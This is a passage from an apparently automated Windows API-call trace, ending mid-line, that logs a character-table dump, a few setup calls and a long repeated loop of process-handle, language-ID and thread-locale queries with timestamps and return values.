¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ·r\x11\x0b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0168.594] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e57b) returned 0x0 [0168.595] RtlSizeHeap (HeapHandle=0x4030000, Flags=0x0, MemoryPointer=0x4032c10) returned 0x80 [0168.595] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76600000 [0168.595] GetCurrentProcess () returned 0xffffffff [0168.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.598] GetSystemDefaultLangID () returned 0x26b0409 [0168.598] GetThreadLocale () returned 0x409 [0168.598] GetCurrentProcess () returned 0xffffffff [0168.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.598] GetSystemDefaultLangID () returned 0x26b0409 [0168.598] GetThreadLocale () returned 0x409 [0168.598] GetCurrentProcess () returned 0xffffffff [0168.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.599] GetSystemDefaultLangID () returned 0x26b0409 [0168.599] GetThreadLocale () returned 0x409 [0168.599] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.600] GetSystemDefaultLangID () returned 0x26b0409 [0168.600] GetThreadLocale () returned 0x409 [0168.600] GetCurrentProcess () returned 0xffffffff [0168.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.601] GetCurrentProcess () returned 0xffffffff [0168.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.601] GetSystemDefaultLangID () returned 0x26b0409 [0168.601] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.602] GetSystemDefaultLangID () returned 0x26b0409 [0168.602] GetThreadLocale () returned 0x409 [0168.602] GetCurrentProcess () returned 0xffffffff [0168.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.603] GetThreadLocale () returned 0x409 [0168.603] GetCurrentProcess () returned 0xffffffff [0168.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.603] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.604] GetThreadLocale () returned 0x409 [0168.604] GetCurrentProcess () returned 0xffffffff [0168.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.604] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.605] GetCurrentProcess () returned 0xffffffff [0168.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.605] GetSystemDefaultLangID () returned 0x26b0409 [0168.605] GetThreadLocale () returned 0x409 [0168.606] GetCurrentProcess () returned 0xffffffff [0168.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.606] GetSystemDefaultLangID () returned 0x26b0409 [0168.606] GetThreadLocale () returned 0x409 [0168.606] GetCurrentProcess () returned 0xffffffff [0168.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.606] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.607] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.607] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.607] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.607] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.607] GetSystemDefaultLangID () returned 0x26b0409 [0168.607] GetThreadLocale () returned 0x409 [0168.607] GetCurrentProcess () returned 0xffffffff [0168.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.608] GetSystemDefaultLangID () returned 0x26b0409 [0168.608] GetThreadLocale () returned 0x409 [0168.608] GetCurrentProcess () returned 0xffffffff [0168.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.609] GetThreadLocale () returned 0x409 [0168.609] GetCurrentProcess () returned 0xffffffff [0168.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.609] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.610] GetThreadLocale () returned 0x409 [0168.610] GetCurrentProcess () returned 0xffffffff [0168.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.610] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.611] GetSystemDefaultLangID () returned 0x26b0409 [0168.611] GetThreadLocale () returned 0x409 [0168.611] GetCurrentProcess () returned 0xffffffff [0168.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 